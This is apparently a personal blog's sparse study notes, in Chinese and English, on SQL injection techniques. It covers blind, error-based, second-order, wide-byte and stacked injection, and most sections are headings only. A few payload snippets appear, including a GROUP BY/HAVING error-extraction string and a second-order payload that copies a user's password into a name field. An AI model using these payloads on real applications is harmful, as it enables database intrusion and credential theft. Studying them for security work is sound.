iloveflag-blog

sql注入

字数统计: 404阅读时长: 1 min
2019/07/13 Share

联合查询与order by

盲注Blind SQL Injections

About Blind SQL Injections
In a quite good production application generally you can not see error responses on the page, so you can not extract data through Union attacks or error based attacks. You have to do use Blind SQL Injections attacks to extract data. There are two kind of Blind Sql Injections.

Normal Blind, You can not see a response in the page, but you can still determine result of a query from response or HTTP status code
Totally Blind, You can not see any difference in the output in any kind. This can be an injection a logging function or similar. Not so common, though.
当不能直接通过显示数据来获得数据库数据时,需要使用其他方式判断或者尝试,这个过程就是盲注。

基于布尔盲注(根据页面返回内容判断)

MySQL If Statement
IF(condition,true-part,false-part) (M)
SELECT IF(1=1,’true’,’false’)

Using CONCAT() in MySQL
SELECT CONCAT(CHAR(75),CHAR(76),CHAR(77)) (M)
This will return ‘KLM’.

 HAVING 配合 GROUP BY 使用,对分组后的数据进行限制,可以使用聚合函数。
 ‘ GROUP BY table.columnfromerror1, columnfromerror2 HAVING 1=1 —

基于时间盲注(根据页面响应时间判断)

报错注入

二次注入

Basically, you put an SQL Injection to some place and expect it’s unfiltered in another action. This is common hidden layer problem.

Name : ‘ + (SELECT TOP 1 password FROM users ) + ‘
Email : xx@xx.com

If application is using name field in an unsafe stored procedure or function, process etc. then it will insert first users password as your name etc.

宽字节注入

宽字节注入

堆叠查询注入

堆叠查询是指可以在单次数据库连接中,执行多个查询序列。简单的来说就是执行多条语句。

xff注入

usr_agent html注入

json注入

Web漏洞挖掘速成特训营.pdfWeb漏洞挖掘速成特训营.pdf

CATALOG
  1. 1. 联合查询与order by
  2. 2. 盲注Blind SQL Injections
    1. 2.1. 基于布尔盲注(根据页面返回内容判断)
    2. 2.2. 基于时间盲注(根据页面响应时间判断)
  3. 3. 报错注入
  4. 4. 二次注入
  5. 5. 宽字节注入
  6. 6. 堆叠查询注入
  7. 7. xff注入
  8. 8. usr_agent html注入
  9. 9. json注入